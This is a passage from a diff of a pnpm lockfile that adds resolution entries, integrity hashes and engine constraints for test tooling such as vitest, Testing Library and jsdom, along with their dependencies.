'@acemir/cssom@0.9.31': + resolution: {integrity: sha512-ZnR3GSaH+/vJ0YlHau21FjfLYjMpYVIzTD8M8vIEQvIGxeOXyXdzCI140rrCY862p/C/BbzWsjc1dgnM9mkoTA==} + + '@adobe/css-tools@4.4.4': + resolution: {integrity: sha512-Elp+iwUx5rN5+Y8xLt5/GRoG20WGoDCQ/1Fb+1LiGtvwbDavuSk0jhD/eZdckHAuzcDzccnkv+rEjyWfRx18gg==} + + '@asamuzakjp/css-color@5.0.1': + resolution: {integrity: sha512-2SZFvqMyvboVV1d15lMf7XiI3m7SDqXUuKaTymJYLN6dSGadqp+fVojqJlVoMlbZnlTmu3S0TLwLTJpvBMO1Aw==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + '@asamuzakjp/dom-selector@6.8.1': + resolution: {integrity: sha512-MvRz1nCqW0fsy8Qz4dnLIvhOlMzqDVBabZx6lH+YywFDdjXhMY37SmpV1XFX3JzG5GWHn63j6HX6QPr3lZXHvQ==} + + '@asamuzakjp/nwsapi@2.3.9': + resolution: {integrity: sha512-n8GuYSrI9bF7FFZ/SjhwevlHc8xaVlb/7HmHelnc/PZXBD2ZR49NnN9sMMuDdEGPeeRQ5d0hqlSlEpgCX3Wl0Q==} + '@babel/code-frame@7.29.0': resolution: {integrity: sha512-9NhCeYjq9+3uxgdtp20LSiJXJvN0FeCtNGpJxuMFZ1Kv3cWUNb6DOhJwUvcVCzKGR66cw4njwM6hrJLqgOwbcw==} engines: {node: '>=6.9.0'} @@ -104,6 +132,10 @@ packages: peerDependencies: '@babel/core': ^7.0.0-0 + '@babel/runtime@7.28.6': + resolution: {integrity: sha512-05WQkdpL9COIMz4LjTxGpPNCdlpyimKppYNoJ5Di5EUObifl8t4tuLuUBBZEpoLYOmfvIWrsp9fCl0HoPRVTdA==} + engines: {node: '>=6.9.0'} + '@babel/template@7.28.6': resolution: {integrity: sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ==} engines: {node: '>=6.9.0'} @@ -116,6 +148,41 @@ packages: resolution: {integrity: sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==} engines: {node: '>=6.9.0'} + '@bramus/specificity@2.4.2': + resolution: {integrity: sha512-ctxtJ/eA+t+6q2++vj5j7FYX3nRu311q1wfYH3xjlLOsczhlhxAg2FWNUXhpGvAw3BWo1xBcvOV6/YLc2r5FJw==} + hasBin: true + + '@csstools/color-helpers@6.0.2': + resolution: {integrity: sha512-LMGQLS9EuADloEFkcTBR3BwV/CGHV7zyDxVRtVDTwdI2Ca4it0CCVTT9wCkxSgokjE5Ho41hEPgb8OEUwoXr6Q==} + engines: {node: '>=20.19.0'} + + '@csstools/css-calc@3.1.1': + resolution: {integrity: sha512-HJ26Z/vmsZQqs/o3a6bgKslXGFAungXGbinULZO3eMsOyNJHeBBZfup5FiZInOghgoM4Hwnmw+OgbJCNg1wwUQ==} + engines: {node: '>=20.19.0'} + peerDependencies: + '@csstools/css-parser-algorithms': ^4.0.0 + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-color-parser@4.0.2': + resolution: {integrity: sha512-0GEfbBLmTFf0dJlpsNU7zwxRIH0/BGEMuXLTCvFYxuL1tNhqzTbtnFICyJLTNK4a+RechKP75e7w42ClXSnJQw==} + engines: {node: '>=20.19.0'} + peerDependencies: + '@csstools/css-parser-algorithms': ^4.0.0 + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-parser-algorithms@4.0.0': + resolution: {integrity: sha512-+B87qS7fIG3L5h3qwJ/IFbjoVoOe/bpOdh9hAjXbvx0o8ImEmUsGXN0inFOnk2ChCFgqkkGFQ+TpM5rbhkKe4w==} + engines: {node: '>=20.19.0'} + peerDependencies: + '@csstools/css-tokenizer': ^4.0.0 + + '@csstools/css-syntax-patches-for-csstree@1.0.29': + resolution: {integrity: sha512-jx9GjkkP5YHuTmko2eWAvpPnb0mB4mGRr2U7XwVNwevm8nlpobZEVk+GNmiYMk2VuA75v+plfXWyroWKmICZXg==} + + '@csstools/css-tokenizer@4.0.0': + resolution: {integrity: sha512-QxULHAm7cNu72w97JUNCBFODFaXpbDg+dP8b/oWFAZ2MTRppA3U00Y2L1HqaS4J6yBqxwa/Y3nMBaxVKbB/NsA==} + engines: {node: '>=20.19.0'} + '@esbuild/aix-ppc64@0.25.12': resolution: {integrity: sha512-Hhmwd6CInZ3dwpuGTF8fJG6yoWmsToE+vYgD4nytZVxcu1ulHpUQRAB1UJ8+N1Am3Mz4+xOByoQoSZf4D+CpkA==} engines: {node: '>=18'} @@ -272,6 +339,15 @@ packages: cpu: [x64] os: [win32] + '@exodus/bytes@1.14.1': + resolution: {integrity: sha512-OhkBFWI6GcRMUroChZiopRiSp2iAMvEBK47NhJooDqz1RERO4QuZIZnjP63TXX8GAiLABkYmX+fuQsdJ1dd2QQ==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + peerDependencies: + '@noble/hashes': ^1.8.0 || ^2.0.0 + peerDependenciesMeta: + '@noble/hashes': + optional: true + '@jridgewell/gen-mapping@0.3.13': resolution: {integrity: sha512-2kkt/7niJ6MgEPxF0bYdQ6etZaA+fQvDcLKckhy1yIQOzaoKjBBjSj63/aLVjYE3qhRt5dvM+uUyfCg6UKCBbA==} @@ -429,6 +505,35 @@ packages: cpu: [x64] os: [win32] + '@standard-schema/spec@1.1.0': + resolution: {integrity: sha512-l2aFy5jALhniG5HgqrD6jXLi/rUWrKvqN/qJx6yoJsgKhblVd+iqqU4RCXavm/jPityDo5TCvKMnpjKnOriy0w==} + + '@testing-library/dom@10.4.1': + resolution: {integrity: sha512-o4PXJQidqJl82ckFaXUeoAW+XysPLauYI43Abki5hABd853iMhitooc6znOnczgbTYmEP6U6/y1ZyKAIsvMKGg==} + engines: {node: '>=18'} + + '@testing-library/jest-dom@6.9.1': + resolution: {integrity: sha512-zIcONa+hVtVSSep9UT3jZ5rizo2BsxgyDYU7WFD5eICBE7no3881HGeb/QkGfsJs6JTkY1aQhT7rIPC7e+0nnA==} + engines: {node: '>=14', npm: '>=6', yarn: '>=1'} + + '@testing-library/react@16.3.2': + resolution: {integrity: sha512-XU5/SytQM+ykqMnAnvB2umaJNIOsLF3PVv//1Ew4CTcpz0/BRyy/af40qqrt7SjKpDdT1saBMc42CUok5gaw+g==} + engines: {node: '>=18'} + peerDependencies: + '@testing-library/dom': ^10.0.0 + '@types/react': ^18.0.0 || ^19.0.0 + '@types/react-dom': ^18.0.0 || ^19.0.0 + react: ^18.0.0 || ^19.0.0 + react-dom: ^18.0.0 || ^19.0.0 + peerDependenciesMeta: + '@types/react': + optional: true + '@types/react-dom': + optional: true + + '@types/aria-query@5.0.4': + resolution: {integrity: sha512-rfT93uj5s0PRL7EzccGMs3brplhcrghnDoV26NqKhCAS1hVo+WdNsPvE/yb6ilfr5hi2MEk6d5EWJTKdxg8jVw==} + '@types/babel__core@7.20.5': resolution: {integrity: sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==} @@ -441,6 +546,12 @@ packages: '@types/babel__traverse@7.28.0': resolution: {integrity: sha512-8PvcXf70gTDZBgt9ptxJ8elBeBjcLOAcOtoO/mPJjtji1+CdGbHgm77om1GrsPxsiE+uXIpNSK64UYaIwQXd4Q==} + '@types/chai@5.2.3': + resolution: {integrity: sha512-Mw558oeA9fFbv65/y4mHtXDs9bPnFMZAL/jxdPFUpOHHIXX91mcgEHbS5Lahr+pwZFR8A7GQleRWeI6cGFC2UA==} + + '@types/deep-eql@4.0.2': + resolution: {integrity: sha512-c9h9dVVMigMPc4bwTvC5dxqtqJZwQPePsWjPlpSOnojbor6pGqdk541lfA7AqFQr5pB1BRdq0juY9db81BwyFw==} + '@types/estree@1.0.8': resolution: {integrity: sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==} @@ -458,11 +569,66 @@ packages: peerDependencies: vite: ^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 + '@vitest/expect@4.0.18': + resolution: {integrity: sha512-8sCWUyckXXYvx4opfzVY03EOiYVxyNrHS5QxX3DAIi5dpJAAkyJezHCP77VMX4HKA2LDT/Jpfo8i2r5BE3GnQQ==} + + '@vitest/mocker@4.0.18': + resolution: {integrity: sha512-HhVd0MDnzzsgevnOWCBj5Otnzobjy5wLBe4EdeeFGv8luMsGcYqDuFRMcttKWZA5vVO8RFjexVovXvAM4JoJDQ==} + peerDependencies: + msw: ^2.4.9 + vite: ^6.0.0 || ^7.0.0-0 + peerDependenciesMeta: + msw: + optional: true + vite: + optional: true + + '@vitest/pretty-format@4.0.18': + resolution: {integrity: sha512-P24GK3GulZWC5tz87ux0m8OADrQIUVDPIjjj65vBXYG17ZeU3qD7r+MNZ1RNv4l8CGU2vtTRqixrOi9fYk/yKw==} + + '@vitest/runner@4.0.18': + resolution: {integrity: sha512-rpk9y12PGa22Jg6g5M3UVVnTS7+zycIGk9ZNGN+m6tZHKQb7jrP7/77WfZy13Y/EUDd52NDsLRQhYKtv7XfPQw==} + + '@vitest/snapshot@4.0.18': + resolution: {integrity: sha512-PCiV0rcl7jKQjbgYqjtakly6T1uwv/5BQ9SwBLekVg/EaYeQFPiXcgrC2Y7vDMA8dM1SUEAEV82kgSQIlXNMvA==} + + '@vitest/spy@4.0.18': + resolution: {integrity: sha512-cbQt3PTSD7P2OARdVW3qWER5EGq7PHlvE+QfzSC0lbwO+xnt7+XH06ZzFjFRgzUX//JmpxrCu92VdwvEPlWSNw==} + + '@vitest/utils@4.0.18': + resolution: {integrity: sha512-msMRKLMVLWygpK3u2Hybgi4MNjcYJvwTb0Ru09+fOyCXIgT5raYP041DRRdiJiI3k/2U6SEbAETB3YtBrUkCFA==} + + agent-base@7.1.4: + resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} + engines: {node: '>= 14'} + + ansi-regex@5.0.1: + resolution: {integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==} + engines: {node: '>=8'} + + ansi-styles@5.2.0: + resolution: {integrity: sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==} + engines: {node: '>=10'} + + aria-query@5.3.0: + resolution: {integrity: sha512-b0P0sZPKtyu8HkeRAfCq0IfURZK+SuwMjY1UXGBU27wpAiTwQAIlq56IbIO+ytk/JjS1fMR14ee5WBBfKi5J6A==} + + aria-query@5.3.2: + resolution: {integrity: sha512-COROpnaoap1E2F000S62r6A60uHZnmlvomhfyT2DlTcrY1OrBKn2UhH7qn5wTC9zMvD0AY7csdPSNwKP+7WiQw==} + engines: {node: '>= 0.4'} + + assertion-error@2.0.1: + resolution: {integrity: sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==} + engines: {node: '>=12'} + baseline-browser-mapping@2.10.0: resolution: {integrity: sha512-lIyg0szRfYbiy67j9KN8IyeD7q7hcmqnJ1ddWmNt19ItGpNN64mnllmxUNFIOdOm6by97jlL6wfpTTJrmnjWAA==} engines: {node: '>=6.0.0'} hasBin: true + bidi-js@1.0.3: + resolution: {integrity: sha512-RKshQI1R3YQ+n9YJz2QQ147P66ELpa1FQEg20Dk8oW9t2KgLbpDLLp9aGZ7y8WHSshDknG0bknqGw5/tyCs5tw==} + browserslist@4.28.1: resolution: {integrity: sha512-ZC5Bd0LgJXgwGqUknZY/vkUQ04r8NXnJZ3yYi4vDmSiZmC/pdSN0NbNRPxZpbtO4uAfDUAFffO8IZoM3Gj8IkA==} engines: {node: ^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7} @@ -471,12 +637,31 @@ packages: caniuse-lite@1.0.30001774: resolution: {integrity: sha512-DDdwPGz99nmIEv216hKSgLD+D4ikHQHjBC/seF98N9CPqRX4M5mSxT9eTV6oyisnJcuzxtZy4n17yKKQYmYQOA==} + chai@6.2.2: + resolution: {integrity: sha512-NUPRluOfOiTKBKvWPtSD4PhFvWCqOi0BGStNWs57X9js7XGTprSmFoz5F0tWhR4WPjNeR9jXqdC7/UpSJTnlRg==} + engines: {node: '>=18'} + convert-source-map@2.0.0: resolution: {integrity: sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==} + css-tree@3.1.0: + resolution: {integrity: sha512-0eW44TGN5SQXU1mWSkKwFstI/22X2bG1nYzZTYMAWjylYURhse752YgbE4Cx46AC+bAvI+/dYTPRk1LqSUnu6w==} + engines: {node: ^10 || ^12.20.0 || ^14.13.0 || >=15.0.0} + + css.escape@1.5.1: + resolution: {integrity: sha512-YUifsXXuknHlUsmlgyY0PKzgPOr7/FjCePfHNt0jxm83wHZi44VDMQ7/fGNkjY3/jV1MC+1CmZbaHzugyeRtpg==} + + cssstyle@6.2.0: + resolution: {integrity: sha512-Fm5NvhYathRnXNVndkUsCCuR63DCLVVwGOOwQw782coXFi5HhkXdu289l59HlXZBawsyNccXfWRYvLzcDCdDig==} + engines: {node: '>=20'} + csstype@3.2.3: resolution: {integrity: sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ==} + data-urls@7.0.0: + resolution: {integrity: sha512-23XHcCF+coGYevirZceTVD7NdJOqVn+49IHyxgszm+JIiHLoB2TkmPtsYkNWT1pvRSGkc35L6NHs0yHkN2SumA==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + debug@4.4.3: resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} engines: {node: '>=6.0'} @@ -486,9 +671,29 @@ packages: supports-color: optional: true + decimal.js@10.6.0: + resolution: {integrity: sha512-YpgQiITW3JXGntzdUmyUR1V812Hn8T1YVXhCu+wO3OpS4eU9l4YdD3qjyiKdV6mvV29zapkMeD390UVEf2lkUg==} + + dequal@2.0.3: + resolution: {integrity: sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==} + engines: {node: '>=6'} + + dom-accessibility-api@0.5.16: + resolution: {integrity: sha512-X7BJ2yElsnOJ30pZF4uIIDfBEVgF4XEBxL9Bxhy6dnrm5hkzqmsWHGTiHqRiITNhMyFLyAiWndIJP7Z1NTteDg==} + + dom-accessibility-api@0.6.3: + resolution: {integrity: sha512-7ZgogeTnjuHbo+ct10G9Ffp0mif17idi0IyWNVA/wcwcm7NPOD/WEHVP3n7n3MhXqxoIYm8d6MuZohYWIZ4T3w==} + electron-to-chromium@1.5.302: resolution: {integrity: sha512-sM6HAN2LyK82IyPBpznDRqlTQAtuSaO+ShzFiWTvoMJLHyZ+Y39r8VMfHzwbU8MVBzQ4Wdn85+wlZl2TLGIlwg==} + entities@6.0.1: + resolution: {integrity: sha512-aN97NXWF6AWBTahfVOIrB/NShkzi5H7F9r1s9mD3cDj4Ko5f2qhhVoYMibXF7GlLveb/D2ioWay8lxI97Ven3g==} + engines: {node: '>=0.12'} + + es-module-lexer@1.7.0: + resolution: {integrity: sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==} + esbuild@0.25.12: resolution: {integrity: sha512-bbPBYYrtZbkt6Os6FiTLCTFxvq4tt3JKall1vRwshA3fdVztsLAatFaZobhkBC8/BrPetoa0oksYoKXoG4ryJg==} engines: {node: '>=18'} @@ -498,6 +703,13 @@ packages: resolution: {integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==} engines: {node: '>=6'} + estree-walker@3.0.3: + resolution: {integrity: sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==} + + expect-type@1.3.0: + resolution: {integrity: sha512-knvyeauYhqjOYvQ66MznSMs83wmHrCycNEN6Ao+2AeYEfxUIkuiVxdEa1qlGEPK+We3n0THiDciYSsCcgW/DoA==} + engines: {node: '>=12.0.0'} + fdir@6.5.0: resolution: {integrity: sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==} engines: {node: '>=12.0.0'} @@ -516,9 +728,37 @@ packages: resolution: {integrity: sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==} engines: {node: '>=6.9.0'} + html-encoding-sniffer@6.0.0: + resolution: {integrity: sha512-CV9TW3Y3f8/wT0BRFc1/KAVQ3TUHiXmaAb6VW9vtiMFf7SLoMd1PdAc4W3KFOFETBJUb90KatHqlsZMWV+R9Gg==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + + http-proxy-agent@7.0.2: + resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} + engines: {node: '>= 14'} + + https-proxy-agent@7.0.6: + resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} + engines: {node: '>= 14'} + + indent-string@4.0.0: + resolution: {integrity: sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==} + engines: {node: '>=8'} + + is-potential-custom-element-name@1.0.1: + resolution: {integrity: sha512-bCYeRA2rVibKZd+s2625gGnGF/t7DSqDs4dP7CrLA1m7jKWz6pps0LpYLJN8Q64HtmPKJ1hrN3nzPNKFEKOUiQ==} + js-tokens@4.0.0: resolution: {integrity: sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==} + jsdom@28.1.0: + resolution: {integrity: sha512-0+MoQNYyr2rBHqO1xilltfDjV9G7ymYGlAUazgcDLQaUf8JDHbuGwsxN6U9qWaElZ4w1B2r7yEGIL3GdeW3Rug==} + engines: {node: ^20.19.0 || ^22.12.0 || >=24.0.0} + peerDependencies: + canvas: ^3.0.0 + peerDependenciesMeta: + canvas: + optional: true + jsesc@3.1.0: resolution: {integrity: sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==} engines: {node: '>=6'} @@ -529,9 +769,27 @@ packages: engines: {node: '>=6'} hasBin: true + lru-cache@11.2.6: + resolution: {integrity: sha512-ESL2CrkS/2wTPfuend7Zhkzo2u0daGJ/A2VucJOgQ/C48S/zB8MMeMHSGKYpXhIjbPxfuezITkaBH1wqv00DDQ==} + engines: {node: 20 || >=22} + lru-cache@5.1.1: resolution: {integrity: sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==} + lz-string@1.5.0: + resolution: {integrity: sha512-h5bgJWpxJNswbU7qCrV0tIKQCaS3blPDrqKWx+QxzuzL1zGUzij9XCWLrSLsJPu5t+eWA/ycetzYAO5IOMcWAQ==} + hasBin: true + + magic-string@0.30.21: + resolution: {integrity: sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==} + + mdn-data@2.12.2: + resolution: {integrity: sha512-IEn+pegP1aManZuckezWCO+XZQDplx1366JoVhTpMpBB1sPey/SbveZQUosKiKiGYjg1wH4pMlNgXbCiYgihQA==} + + min-indent@1.0.1: + resolution: {integrity: sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==} + engines: {node: '>=4'} + ms@2.1.3: resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} @@ -543,6 +801,15 @@ packages: node-releases@2.0.27: resolution: {integrity: sha512-nmh3lCkYZ3grZvqcCH+fjmQ7X+H0OeZgP40OierEaAptX4XofMh5kwNbWh7lBduUzCcV/8kZ+NDLCwm2iorIlA==} + obug@2.1.1: + resolution: {integrity: sha512-uTqF9MuPraAQ+IsnPf366RG4cP9RtUi7MLO1N3KEc+wb0a6yKpeL0lmk2IB1jY5KHPAlTc6T/JRdC/YqxHNwkQ==} + + parse5@8.0.0: + resolution: {integrity: sha512-9m4m5GSgXjL4AjumKzq1Fgfp3Z8rsvjRNbnkVwfu2ImRqE5D0LnY2QfDen18FSY9C573YU5XxSapdHZTZ2WolA==} + + pathe@2.0.3: + resolution: {integrity: sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==} + picocolors@1.1.1: resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==} @@ -554,11 +821,22 @@ packages: resolution: {integrity: sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==} engines: {node: ^10 || ^12 || >=14} + pretty-format@27.5.1: + resolution: {integrity: sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==} + engines: {node: ^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0} + + punycode@2.3.1: + resolution: {integrity: sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==} + engines: {node: '>=6'} + react-dom@19.2.4: resolution: {integrity: sha512-AXJdLo8kgMbimY95O2aKQqsz2iWi9jMgKJhRBAxECE4IFxfcazB2LmzloIoibJI3C12IlY20+KFaLv+71bUJeQ==} peerDependencies: react: ^19.2.4 + react-is@17.0.2: + resolution: {integrity: sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==} + react-refresh@0.17.0: resolution: {integrity: sha512-z6F7K9bV85EfseRCp2bzrpyQ0Gkw1uLoCel9XBVWPg/TjRj94SkJzUTGfOa4bs7iJvBWtQG0Wq7wnI0syw3EBQ==} engines: {node: '>=0.10.0'} @@ -567,11 +845,23 @@ packages: resolution: {integrity: sha512-9nfp2hYpCwOjAN+8TZFGhtWEwgvWHXqESH8qT89AT/lWklpLON22Lc8pEtnpsZz7VmawabSU0gCjnj8aC0euHQ==} engines: {node: '>=0.10.0'} + redent@3.0.0: + resolution: {integrity: sha512-6tDA8g98We0zd0GvVeMT9arEOnTw9qM03L9cJXaCjrip1OO764RDBLBfrB4cwzNGDj5OA5ioymC9GkizgWJDUg==} + engines: {node: '>=8'} + + require-from-string@2.0.2: + resolution: {integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==} + engines: {node: '>=0.10.0'} + rollup@4.59.0: resolution: {integrity: sha512-2oMpl67a3zCH9H79LeMcbDhXW/UmWG/y2zuqnF2jQq5uq9TbM9TVyXvA4+t+ne2IIkBdrLpAaRQAvo7YI/Yyeg==} engines: {node: '>=18.0.0', npm: '>=8.0.0'} hasBin: true + saxes@6.0.0: + resolution: {integrity: sha512-xAg7SOnEhrm5zI3puOOKyy1OMcMlIJZYNJY7xLBwSze0UjhPLnWfj2GF2EpT0jmzaJKIWKHLsaSSajf35bcYnA==} + engines: {node: '>=v12.22.7'} + scheduler@0.27.0: resolution: {integrity: sha512-eNv+WrVbKu1f3vbYJT/xtiF5syA5HPIMtf9IgY/nKg0sWqzAUEvqY/xm7OcZc/qafLx/iO9FgOmeSAp4v5ti/Q==} @@ -579,19 +869,65 @@ packages: resolution: {integrity: sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==} hasBin: true + siginfo@2.0.0: + resolution: {integrity: sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==} + source-map-js@1.2.1: resolution: {integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==} engines: {node: '>=0.10.0'} + stackback@0.0.2: + resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==} + + std-env@3.10.0: + resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==} + + strip-indent@3.0.0: + resolution: {integrity: sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==} + engines: {node: '>=8'} + + symbol-tree@3.2.4: + resolution: {integrity: sha512-9QNk5KwDF+Bvz+PyObkmSYjI5ksVUYtjW7AU22r2NKcfLJcXp96hkDWU3+XndOsUb+AQ9QhfzfCT2O+CNWT5Tw==} + + tinybench@2.9.0: + resolution: {integrity: sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==} + + tinyexec@1.0.2: + resolution: {integrity: sha512-W/KYk+NFhkmsYpuHq5JykngiOCnxeVL8v8dFnqxSD8qEEdRfXk1SDM6JzNqcERbcGYj9tMrDQBYV9cjgnunFIg==} + engines: {node: '>=18'} + tinyglobby@0.2.15: resolution: {integrity: sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==} engines: {node: '>=12.0.0'} + tinyrainbow@3.0.3: + resolution: {integrity: sha512-PSkbLUoxOFRzJYjjxHJt9xro7D+iilgMX/C9lawzVuYiIdcihh9DXmVibBe8lmcFrRi/VzlPjBxbN7rH24q8/Q==} + engines: {node: '>=14.0.0'} + + tldts-core@7.0.24: + resolution: {integrity: sha512-pj7yygNMoMRqG7ML2SDQ0xNIOfN3IBDUcPVM2Sg6hP96oFNN2nqnzHreT3z9xLq85IWJyNTvD38O002DdOrPMw==} + + tldts@7.0.24: + resolution: {integrity: sha512-1r6vQTTt1rUiJkI5vX7KG8PR342Ru/5Oh13kEQP2SMbRSZpOey9SrBe27IDxkoWulx8ShWu4K6C0BkctP8Z1bQ==} + hasBin: true + + tough-cookie@6.0.0: + resolution: {integrity: sha512-kXuRi1mtaKMrsLUxz3sQYvVl37B0Ns6MzfrtV5DvJceE9bPyspOqk9xxv7XbZWcfLWbFmm997vl83qUWVJA64w==} + engines: {node: '>=16'} + + tr46@6.0.0: + resolution: {integrity: sha512-bLVMLPtstlZ4iMQHpFHTR7GAGj2jxi8Dg0s2h2MafAE4uSWF98FC/3MomU51iQAMf8/qDUbKWf5GxuvvVcXEhw==} + engines: {node: '>=20'} + typescript@5.9.3: resolution: {integrity: sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==} engines: {node: '>=14.17'} hasBin: true + undici@7.22.0: + resolution: {integrity: sha512-RqslV2Us5BrllB+JeiZnK4peryVTndy9Dnqq62S3yYRRTj0tFQCwEniUy2167skdGOy3vqRzEvl1Dm4sV2ReDg==} + engines: {node: '>=20.18.1'} + update-browserslist-db@1.2.3: 